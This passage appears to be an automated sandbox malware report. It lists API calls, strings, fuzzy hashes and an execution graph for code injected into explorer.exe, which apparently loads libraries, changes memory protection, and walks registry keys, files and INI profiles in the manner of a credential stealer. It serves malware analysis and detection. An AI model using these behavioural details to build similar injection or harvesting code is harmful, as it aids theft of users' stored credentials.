                                                                                            • Opcode Fuzzy Hash: ad4f917900dfe66d5b2753c7700d40e6c77de9714fa6e55116573476ef703178
                                                                                            • Instruction Fuzzy Hash: 6801A271201349AF9B015F269C1889F7BAAEF85351B10C42EF5118B210DF35C904AA24
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.3152220899.00000000006E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E1000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_6e1000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: -x0$NaN
                                                                                            • API String ID: 0-3447725786
                                                                                            • Opcode ID: f6cb62e0589dd7f7a25f3b45e8f479b602919c308eee84da45930534cb0fa847
                                                                                            • Instruction ID: aabf9f1168faed6761f622bee0be3ea8f6d493c65d34c1e980bf332ed2cb8008
                                                                                            • Opcode Fuzzy Hash: f6cb62e0589dd7f7a25f3b45e8f479b602919c308eee84da45930534cb0fa847
                                                                                            • Instruction Fuzzy Hash: FBE1F57060E3C28FD7258E2AC4547ABBBE3AFA5344F28496DF8C187392D664CD46D742
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.3152220899.00000000006E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E1000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_6e1000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: -x0$NaN
                                                                                            • API String ID: 0-3447725786
                                                                                            • Opcode ID: ba5d73f00a8a4a5a7f169cb442de85f79ed7b6e61d0dbda6a409ea5fdf1e3986
                                                                                            • Instruction ID: c96525260237899a3e13c70eba24a3369950b38a84fdc23fecd158c141e35df2
                                                                                            • Opcode Fuzzy Hash: ba5d73f00a8a4a5a7f169cb442de85f79ed7b6e61d0dbda6a409ea5fdf1e3986
                                                                                            • Instruction Fuzzy Hash: F2E1F27060E3C28FD725CE2AC4947AABBE3AF95344F28486DF8C187392D664CD45D792
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.3152220899.00000000006E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E1000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_6e1000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: -x0$NaN
                                                                                            • API String ID: 0-3447725786
                                                                                            • Opcode ID: 036612c81b4478db22cf8f0e6c9e9951a007088a41807efa8ac43b4323a8a8c4
                                                                                            • Instruction ID: ec281607c90a6a558095730fe10672d2711223f3066d56633e291bcb9bd19f62
                                                                                            • Opcode Fuzzy Hash: 036612c81b4478db22cf8f0e6c9e9951a007088a41807efa8ac43b4323a8a8c4
                                                                                            • Instruction Fuzzy Hash: FDE1D27060E3C28FD725CE2AC4947AABBE3AF95344F28496DF8C187392D664CD45D782
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.3152220899.00000000006E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E1000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_6e1000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: -x0$NaN
                                                                                            • API String ID: 0-3447725786
                                                                                            • Opcode ID: d45251f7e4e11210f7fffebcae0471bc232093d8ba7ac43177382a2f78b4d9b1
                                                                                            • Instruction ID: 0a3ae498f7b1e004331fbf5c2429b0fcb6aaa4d44dc4e01159baf388a83a3508
                                                                                            • Opcode Fuzzy Hash: d45251f7e4e11210f7fffebcae0471bc232093d8ba7ac43177382a2f78b4d9b1
                                                                                            • Instruction Fuzzy Hash: 44E1D27060E3C28FD725CE2AC4947AABBE3AF99344F28485DF8C187392D664CD45D752
                                                                                            APIs
                                                                                            • _aulldvrm.NTDLL(00000000,00000002,0000000A,00000000), ref: 006E720E
                                                                                            • _aullrem.NTDLL(00000000,?,0000000A,00000000), ref: 006E7226
                                                                                            • _aulldvrm.NTDLL(00000000,00000000,?), ref: 006E727B
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.3152220899.00000000006E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E1000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_6e1000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID: _aulldvrm$_aullrem
                                                                                            • String ID: -x0$NaN
                                                                                            • API String ID: 105165338-3447725786
                                                                                            • Opcode ID: 26a3c32dbdc3bf5ca0186639702df42e3e0397dd5d38bf43a681bdb4330e0c32
                                                                                            • Instruction ID: 5de6043152ac445912972d00c0a2601c39305e44b89628c80f96526544a2800d
                                                                                            • Opcode Fuzzy Hash: 26a3c32dbdc3bf5ca0186639702df42e3e0397dd5d38bf43a681bdb4330e0c32
                                                                                            • Instruction Fuzzy Hash: E9D1F47060E3C28FD7258E2AC4947AABBE3AFA5344F28485DF8C187392D664CD45D742
                                                                                            APIs
                                                                                            • _allmul.NTDLL(00000000,?,0000000A,00000000), ref: 006E8AAD
                                                                                            • _allmul.NTDLL(?,?,0000000A,00000000), ref: 006E8B66
                                                                                            • _allmul.NTDLL(?,00000000,0000000A,00000000), ref: 006E8C9B
                                                                                            • _alldvrm.NTDLL(?,00000000,0000000A,00000000), ref: 006E8CAE
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.3152220899.00000000006E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E1000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_6e1000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID: _allmul$_alldvrm
                                                                                            • String ID: .
                                                                                            • API String ID: 115548886-248832578
                                                                                            • Opcode ID: d0096dd7927318e70d37c691224f100c3d57abef69ec672af2e28d46aa5e6ea4
                                                                                            • Instruction ID: 271557b205cf58782f8147abb36fa26cd1b9d26a0f980efba27c897382b68d53
                                                                                            • Opcode Fuzzy Hash: d0096dd7927318e70d37c691224f100c3d57abef69ec672af2e28d46aa5e6ea4
                                                                                            • Instruction Fuzzy Hash: E7D116B194E7C58FC7108F4A888027ABBF2BFA5714F14096EF5CD87391DBB588458B86
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.3152220899.00000000006E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E1000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_6e1000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID: memset
                                                                                            • String ID: ,$7$9
                                                                                            • API String ID: 2221118986-1653249994
                                                                                            • Opcode ID: b1d51447b54f57044a401778e5baa02a08deb2ee8b9c42d589ff759b1829e7d0
                                                                                            • Instruction ID: 9e6d0a6c7f656cc0ec089b661694e04b9f4b90ae744644717aba5b3470ac1f29
                                                                                            • Opcode Fuzzy Hash: b1d51447b54f57044a401778e5baa02a08deb2ee8b9c42d589ff759b1829e7d0
                                                                                            • Instruction Fuzzy Hash: 9E316D71508344DFD371DF60D444B8FBBE9AF85340F008A2EF98997292EB75A548CB92
                                                                                            APIs
                                                                                            • lstrlenW.KERNEL32(00000000,00000000,?,006E2E75,PathToExe,00000000,00000000), ref: 006E1BCC
                                                                                            • StrStrIW.SHLWAPI(00000000,.exe,?,006E2E75,PathToExe,00000000,00000000), ref: 006E1BF0
                                                                                            • StrRChrIW.SHLWAPI(00000000,00000000,0000005C,?,006E2E75,PathToExe,00000000,00000000), ref: 006E1C05
                                                                                            • lstrlenW.KERNEL32(00000000,?,006E2E75,PathToExe,00000000,00000000), ref: 006E1C1C
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.3152220899.00000000006E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E1000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_6e1000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID: lstrlen
                                                                                            • String ID: .exe
                                                                                            • API String ID: 1659193697-4119554291
                                                                                            • Opcode ID: c2f8d77deeaa6f66219e4116a28f3009108667f9f900c31dfb0baba550bc1303
                                                                                            • Instruction ID: eaa97039e74618620fb3ae84d847e69d14feb200a9172dc65ca78756e4066103
                                                                                            • Opcode Fuzzy Hash: c2f8d77deeaa6f66219e4116a28f3009108667f9f900c31dfb0baba550bc1303
                                                                                            • Instruction Fuzzy Hash: 21F0C8303563606AE3245F369C45AFB62A6EF02742720882DE141C7261F7788C41D76D
                                                                                            APIs
                                                                                              • Part of subcall function 006E1000: GetProcessHeap.KERNEL32(00000008,?,006E11C7,?,?,00000001,00000000,?), ref: 006E1003
                                                                                              • Part of subcall function 006E1000: RtlAllocateHeap.NTDLL(00000000), ref: 006E100A
                                                                                            • GetSystemTimeAsFileTime.KERNEL32(?), ref: 006E2127
                                                                                            • _alldiv.NTDLL(?,?,00989680,00000000), ref: 006E213A
                                                                                            • wsprintfA.USER32 ref: 006E214F
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.3152220899.00000000006E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E1000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_6e1000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID: HeapTime$AllocateFileProcessSystem_alldivwsprintf
                                                                                            • String ID: %li
                                                                                            • API String ID: 4120667308-1021419598
                                                                                            • Opcode ID: 24d888892659d4e480a08512ce0bcd5c99013c464f5b20dffcb77bfec545b31c
                                                                                            • Instruction ID: e367a52e8551f95f7f6cf7bc79e3f5d8328f7f504042c7cdd28f9c75c6ce01c8
                                                                                            • Opcode Fuzzy Hash: 24d888892659d4e480a08512ce0bcd5c99013c464f5b20dffcb77bfec545b31c
                                                                                            • Instruction Fuzzy Hash: 61E0D83264121877E7213BB89C0AEEF7B6DDB40B16F008195F900E6182E9764A2493D9
                                                                                            APIs
                                                                                            • _allmul.NTDLL(?,00000000,00000018), ref: 006F316F
                                                                                            • _allmul.NTDLL(-00000001,00000000,?,?), ref: 006F31D2
                                                                                            • _alldiv.NTDLL(?,?,00000000), ref: 006F32DE
                                                                                            • _allmul.NTDLL(00000000,?,00000000), ref: 006F32E7
                                                                                            • _allmul.NTDLL(?,00000000,?,?), ref: 006F3392
                                                                                              • Part of subcall function 006F16CD: memset.NTDLL ref: 006F172B
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.3152220899.00000000006E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E1000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_6e1000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID: _allmul$_alldivmemset
                                                                                            • String ID:
                                                                                            • API String ID: 3880648599-0
                                                                                            • Opcode ID: 046d8b7b3e0929ff4979f6fcf46b9aaa87e7dca74d29b1c13d3f69a449f56726
                                                                                            • Instruction ID: c61b27933af41a1f1e882c1e1270d72312e03ef7ad613ec0fe361613c089d8a3
                                                                                            • Opcode Fuzzy Hash: 046d8b7b3e0929ff4979f6fcf46b9aaa87e7dca74d29b1c13d3f69a449f56726
                                                                                            • Instruction Fuzzy Hash: 7FD18A716083998BDB24DF69C480BAEBBE2BF84704F14482DFA9587351DB70DE45CB92
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.3152220899.00000000006E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E1000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_6e1000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: FOREIGN KEY constraint failed$new$old
                                                                                            • API String ID: 0-384346570
                                                                                            • Opcode ID: b2f8f388b02534d0ac7e2004cbc00ed81dacf55feec7a66e01e28aeae32d6da6
                                                                                            • Instruction ID: be94d498a4e5c265d9626582b8ab4a9bafa1ebcf597a4519acb008c3d427dc70
                                                                                            • Opcode Fuzzy Hash: b2f8f388b02534d0ac7e2004cbc00ed81dacf55feec7a66e01e28aeae32d6da6
                                                                                            • Instruction Fuzzy Hash: 26D10870608340EFD754DF29C885B6EBBE6AB88750F10891EF9458B2D1DB78D981CB93
                                                                                            APIs
                                                                                            • _alldiv.NTDLL(000000FF,7FFFFFFF,?,?), ref: 006E96E7
                                                                                            • _alldiv.NTDLL(00000000,80000000,?,?), ref: 006E9707
                                                                                            • _alldiv.NTDLL(00000000,80000000,?,?), ref: 006E9739
                                                                                            • _alldiv.NTDLL(00000001,80000000,?,?), ref: 006E976C
                                                                                            • _allmul.NTDLL(?,?,?,?), ref: 006E9798
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.3152220899.00000000006E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E1000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_6e1000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID: _alldiv$_allmul
                                                                                            • String ID:
                                                                                            • API String ID: 4215241517-0
                                                                                            • Opcode ID: aea503a78b0f5229cb44f0642643f5c49b5350688a0b94e79065ce13f3554f20
                                                                                            • Instruction ID: 13b59e5e094e35f34b665d1f9ef9e835d769ff51c2a37035c1d54a31b5e01851
                                                                                            • Opcode Fuzzy Hash: aea503a78b0f5229cb44f0642643f5c49b5350688a0b94e79065ce13f3554f20
                                                                                            • Instruction Fuzzy Hash: 2C21013112B7D56AEF745D1B4CC4BAB768BCF91794F35012EE80182342E962888880B5
                                                                                            APIs
                                                                                            • _allmul.NTDLL(?,00000000,00000000), ref: 006FB1B3
                                                                                            • _alldvrm.NTDLL(?,?,00000000), ref: 006FB20F
                                                                                            • _allrem.NTDLL(?,00000000,?,?), ref: 006FB28A
                                                                                            • memcpy.NTDLL(?,?,00000000,?,00000000,?,?,?,00000000,?,?,00000000,00000000), ref: 006FB298
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.3152220899.00000000006E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E1000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_6e1000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID: _alldvrm_allmul_allremmemcpy
                                                                                            • String ID:
                                                                                            • API String ID: 1484705121-0
                                                                                            • Opcode ID: dae56c5314a831c5015b4a3968050d359503f2cb49f181186188cd21fd9efe7a
                                                                                            • Instruction ID: ecfc0902286aeeb1989814899fe66f25cb3c4de94219880fa780afdaab21b66f
                                                                                            • Opcode Fuzzy Hash: dae56c5314a831c5015b4a3968050d359503f2cb49f181186188cd21fd9efe7a
                                                                                            • Instruction Fuzzy Hash: 344146756083059BC758EF25C89193EBBE6AFC8300F04992DFA9597362DB30ED05CB52
                                                                                            APIs
                                                                                            • lstrlenW.KERNEL32(?,00000000,00000000,?,?,006E2F0C), ref: 006E1973
                                                                                            • lstrlenW.KERNEL32(00736564,?,?,006E2F0C), ref: 006E1978
                                                                                            • lstrcatW.KERNEL32(00000000,?,?,?,006E2F0C), ref: 006E1990
                                                                                            • lstrcatW.KERNEL32(00000000,00736564,?,?,006E2F0C), ref: 006E1994
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.3152220899.00000000006E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E1000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_6e1000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID: lstrcatlstrlen
                                                                                            • String ID:
                                                                                            • API String ID: 1475610065-0
                                                                                            • Opcode ID: 9e8d464c00023807fb57506b3744c39e97f06f61fda0dbad0d3aa5604db0a456
                                                                                            • Instruction ID: 564b04d0254f60a74ce15f358df6505e0a604f401099abe5f0158c8db7f33b68
                                                                                            • Opcode Fuzzy Hash: 9e8d464c00023807fb57506b3744c39e97f06f61fda0dbad0d3aa5604db0a456
                                                                                            • Instruction Fuzzy Hash: 76E0E5A230031C2B571477AF5C90D7B769DCACA6A13054039FA04D7302FD669C0446F4
                                                                                            APIs
                                                                                              • Part of subcall function 006E6A81: memset.NTDLL ref: 006E6A9C
                                                                                            • _aulldiv.NTDLL(?,00000000,?,00000000), ref: 0070F2A1
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.3152220899.00000000006E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E1000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_6e1000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID: _aulldivmemset
                                                                                            • String ID: %llu$%llu
                                                                                            • API String ID: 714058258-4283164361
                                                                                            • Opcode ID: 23ff429ac47805531b5f1e00347a2bcf06bb2db7568c8776d960ec3c5f887449
                                                                                            • Instruction ID: 5b1738eef2529e9c40001513fb6128db140b487afd01dac03d163457c74b0afe
                                                                                            • Opcode Fuzzy Hash: 23ff429ac47805531b5f1e00347a2bcf06bb2db7568c8776d960ec3c5f887449
                                                                                            • Instruction Fuzzy Hash: FD2126B2A44645ABC710AA24CC42F6F7799EF80730F00433CF921976C1EB24EC1187E5
                                                                                            APIs
                                                                                            • _allmul.NTDLL(?,00000000,?), ref: 006F2174
                                                                                            • _allmul.NTDLL(?,?,?,00000000), ref: 006F220E
                                                                                            • _allmul.NTDLL(?,00000000,00000000,?), ref: 006F2241
                                                                                            • _allmul.NTDLL(006E2E26,00000000,?,?), ref: 006F2295
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.3152220899.00000000006E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E1000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_6e1000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID: _allmul
                                                                                            • String ID:
                                                                                            • API String ID: 4029198491-0
                                                                                            • Opcode ID: 3085842643abf35a20991388616d187f76d7e9293e8280a6adbe6ee58f7c727c
                                                                                            • Instruction ID: 0236e9d56a4dc0d2855ff5f5c74aafb75b78a442e250ce676d7623d598ebc704
                                                                                            • Opcode Fuzzy Hash: 3085842643abf35a20991388616d187f76d7e9293e8280a6adbe6ee58f7c727c
                                                                                            • Instruction Fuzzy Hash: 09A189B170870A9BD714DE69C8A1A3EB7E7AF98740F00482CF7458B351EB71ED458B46
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.3152220899.00000000006E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E1000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_6e1000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID: memcpymemset
                                                                                            • String ID:
                                                                                            • API String ID: 1297977491-0
                                                                                            • Opcode ID: d20c6004f6cfed2b8eef0f9f1bb053830f00ce07d7848fba04fdd83305b0a59d
                                                                                            • Instruction ID: 17b14551f8fa3ce0982a7f17a182967316fbace122d720edf89e1b580954f80a
                                                                                            • Opcode Fuzzy Hash: d20c6004f6cfed2b8eef0f9f1bb053830f00ce07d7848fba04fdd83305b0a59d
                                                                                            • Instruction Fuzzy Hash: 65818C716083589FC350DF29C881A7BBBE6FF88704F14496DF98A8B352E670E905CB91
                                                                                            APIs
                                                                                            • lstrlen.KERNEL32(?,?,?,?,00000000,006E2783), ref: 006E192B
                                                                                            • lstrlen.KERNEL32(00000000,?,?,?,00000000,006E2783), ref: 006E1930
                                                                                            • lstrcat.KERNEL32(00000000,?), ref: 006E1946
                                                                                            • lstrcat.KERNEL32(00000000,00000000), ref: 006E194A
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.3152220899.00000000006E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E1000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_6e1000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID: lstrcatlstrlen
                                                                                            • String ID:
                                                                                            • API String ID: 1475610065-0
                                                                                            • Opcode ID: c02932c6bac02d8d6f9bb81c3c130fd82ad77f5b77e782da7587f57ec7f00d12
                                                                                            • Instruction ID: 0031d2d951c1128540480d6f76cf10fe944d87c3746a9bdfb3ad9b98bf6fb214
                                                                                            • Opcode Fuzzy Hash: c02932c6bac02d8d6f9bb81c3c130fd82ad77f5b77e782da7587f57ec7f00d12
                                                                                            • Instruction Fuzzy Hash: FFE09B6230135C2B572177BF6C94D7B76DDCAD65A53054035F904C7303EE669C0596B4

                                                                                            Execution Graph

                                                                                            Execution Coverage:21.7%
                                                                                            Dynamic/Decrypted Code Coverage:87.3%
                                                                                            Signature Coverage:0%
                                                                                            Total number of Nodes:181
                                                                                            Total number of Limit Nodes:17
                                                                                            execution_graph 1143 cba1f9 1144 cba228 1143->1144 1146 cba248 1143->1146 1145 cba298 3 API calls 1144->1145 1145->1146 936 cba298 941 cba29d 936->941 937 cba385 LoadLibraryA 937->941 939 cba46e 939->939 940 cba3e0 VirtualProtect VirtualProtect 940->939 941->937 941->940 942 cba3d5 941->942 991 cb3608 996 cb3458 StrStrIW 991->996 994 cb3458 17 API calls 995 cb365d 994->995 997 cb348f 996->997 998 cb350f 996->998 1021 cb2774 997->1021 1000 cb3523 RegOpenKeyExW 998->1000 1001 cb35e4 1000->1001 1012 cb354d 1000->1012 1002 cb1860 RtlFreeHeap 1001->1002 1004 cb35f7 1002->1004 1003 cb35b5 RegEnumKeyExW 1003->1001 1003->1012 1004->994 1005 cb34a8 1005->998 1006 cb3507 1005->1006 1034 cb28a0 1005->1034 1008 cb1860 RtlFreeHeap 1006->1008 1008->998 1010 cb2700 RtlFreeHeap 1010->1012 1011 cb34fa 1015 cb1860 RtlFreeHeap 1011->1015 1012->1003 1012->1010 1014 cb3458 14 API calls 1012->1014 1017 cb1860 RtlFreeHeap 1012->1017 1014->1012 1015->1006 1017->1012 1020 cb1860 RtlFreeHeap 1020->1011 1022 cb2793 1021->1022 1023 cb2797 RegOpenKeyExW 1021->1023 1022->1023 1024 cb286b 1023->1024 1025 cb27d5 RegQueryValueExW 1023->1025 1027 cb2774 RtlFreeHeap 1024->1027 1028 cb288d 1024->1028 1026 cb285b RegCloseKey 1025->1026 1029 cb27fe 1025->1029 1026->1024 1026->1028 1027->1028 1028->1005 1029->1026 1030 cb281a RegQueryValueExW 1029->1030 1031 cb2851 1030->1031 1032 cb2844 1030->1032 1033 cb1860 RtlFreeHeap 1031->1033 1032->1026 1033->1032 1036 cb28b9 1034->1036 1035 cb2922 1035->1011 1040 cb2700 1035->1040 1036->1035 1037 cb1860 RtlFreeHeap 1036->1037 1039 cb28df 1037->1039 1038 cb2774 5 API calls 1038->1039 1039->1035 1039->1038 1041 cb2712 1040->1041 1042 cb1860 RtlFreeHeap 1041->1042 1043 cb271d 1042->1043 1043->1011 1044 cb3254 1043->1044 1068 cb298c 1044->1068 1047 cb343a 1047->1020 1048 cb298c GetFileAttributesW 1050 cb3295 1048->1050 1049 cb342c 1077 cb30a8 1049->1077 1050->1047 1050->1049 1072 cb2938 1050->1072 1054 cb340c 1056 cb1860 RtlFreeHeap 1054->1056 1055 cb3304 GetPrivateProfileSectionNamesW 1055->1054 1066 cb331e 1055->1066 1057 cb3414 1056->1057 1058 cb1860 RtlFreeHeap 1057->1058 1059 cb341c 1058->1059 1060 cb1860 RtlFreeHeap 1059->1060 1062 cb3424 1060->1062 1061 cb334e GetPrivateProfileStringW 1063 cb3379 GetPrivateProfileIntW 1061->1063 1061->1066 1064 cb1860 RtlFreeHeap 1062->1064 1063->1066 1064->1049 1065 cb30a8 RtlFreeHeap FindFirstFileW FindNextFileW FindClose 1065->1066 1066->1054 1066->1061 1066->1065 1067 cb1860 RtlFreeHeap 1066->1067 1067->1066 1069 cb2999 1068->1069 1070 cb29a9 1068->1070 1069->1070 1071 cb299e GetFileAttributesW 1069->1071 1070->1047 1070->1048 1071->1070 1073 cb2945 1072->1073 1074 cb2980 1072->1074 1073->1074 1075 cb294a CreateFileW 1073->1075 1074->1054 1074->1055 1075->1074 1076 cb2972 CloseHandle 1075->1076 1076->1074 1078 cb30cc 1077->1078 1079 cb30f1 FindFirstFileW 1078->1079 1080 cb3237 1079->1080 1090 cb3117 1079->1090 1081 cb1860 RtlFreeHeap 1080->1081 1082 cb323f 1081->1082 1083 cb1860 RtlFreeHeap 1082->1083 1084 cb3247 1083->1084 1084->1047 1085 cb3210 FindNextFileW 1087 cb3226 FindClose 1085->1087 1085->1090 1086 cb2700 RtlFreeHeap 1086->1090 1087->1080 1088 cb1860 RtlFreeHeap 1088->1085 1090->1085 1090->1086 1090->1088 1091 cb30a8 RtlFreeHeap 1090->1091 1092 cb1860 RtlFreeHeap 1090->1092 1093 cb2f7c 1090->1093 1091->1090 1092->1090 1103 cb2bc0 1093->1103 1096 cb3086 1096->1090 1098 cb307e 1099 cb1860 RtlFreeHeap 1098->1099 1099->1096 1100 cb2e04 RtlFreeHeap 1101 cb2fb6 1100->1101 1101->1096 1101->1098 1101->1100 1102 cb1860 RtlFreeHeap 1101->1102 1102->1101 1104 cb2bf3 1103->1104 1105 cb2700 RtlFreeHeap 1104->1105 1106 cb2c54 1105->1106 1107 cb2a54 RtlFreeHeap 1106->1107 1108 cb2c68 1107->1108 1109 cb2c7e 1108->1109 1110 cb1860 RtlFreeHeap 1108->1110 1111 cb1860 RtlFreeHeap 1109->1111 1110->1109 1117 cb2cb2 1111->1117 1112 cb2da3 1113 cb1860 RtlFreeHeap 1112->1113 1114 cb2dd9 1113->1114 1115 cb1860 RtlFreeHeap 1114->1115 1116 cb2de1 1115->1116 1116->1096 1119 cb2a54 1116->1119 1117->1112 1118 cb1860 RtlFreeHeap 1117->1118 1118->1112 1121 cb2a86 1119->1121 1120 cb2ad9 1120->1101 1121->1120 1122 cb1860 RtlFreeHeap 1121->1122 1122->1120 1123 cb3668 1124 cb3458 17 API calls 1123->1124 1125 cb369b 1124->1125 1126 cb3458 17 API calls 1125->1126 1127 cb36bd 1126->1127 1128 cba1af 1129 cba1bd 1128->1129 1130 cba1cf 1129->1130 1132 cba298 1129->1132 1137 cba29d 1132->1137 1133 cba385 LoadLibraryA 1133->1137 1135 cba46e 1135->1135 1136 cba3e0 VirtualProtect VirtualProtect 1136->1135 1137->1133 1137->1136 1138 cba3d5 1137->1138 1138->1130 1139 cba1e0 1140 cba1e6 1139->1140 1141 cba298 3 API calls 1140->1141 1142 cba248 1141->1142 943 cb37f4 944 cb3804 943->944 951 cb372c 944->951 948 cb3817 949 cb387c 948->949 961 cb36c8 948->961 952 cb375a 951->952 953 cb3777 RegCreateKeyExW 952->953 954 cb37bc RegCloseKey 953->954 955 cb37cd 953->955 954->955 969 cb1860 955->969 958 cb22b4 959 cb22c8 CreateStreamOnHGlobal 958->959 960 cb22d6 958->960 959->960 960->948 962 cb371e 961->962 963 cb36cd 961->963 962->949 964 cb3716 963->964 973 cb21e4 963->973 966 cb1860 RtlFreeHeap 964->966 966->962 967 cb3706 968 cb1860 RtlFreeHeap 967->968 968->964 970 cb186e 969->970 971 cb1886 970->971 972 cb1878 RtlFreeHeap 970->972 971->949 971->958 972->971 974 cb220b 973->974 979 cb1e20 974->979 977 cb1860 RtlFreeHeap 978 cb2297 977->978 978->967 988 cb1e6d 979->988 980 cb21b5 981 cb1860 RtlFreeHeap 980->981 982 cb21cb 981->982 982->977 983 cb219b 983->980 984 cb1860 RtlFreeHeap 983->984 984->980 985 cb1860 RtlFreeHeap 986 cb218e 985->986 986->983 987 cb1860 RtlFreeHeap 986->987 987->983 988->980 988->983 989 cb1860 RtlFreeHeap 988->989 990 cb2177 988->990 989->990 990->985

                                                                                            Callgraph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            • Opacity -> Relevance
                                                                                            • Disassembly available
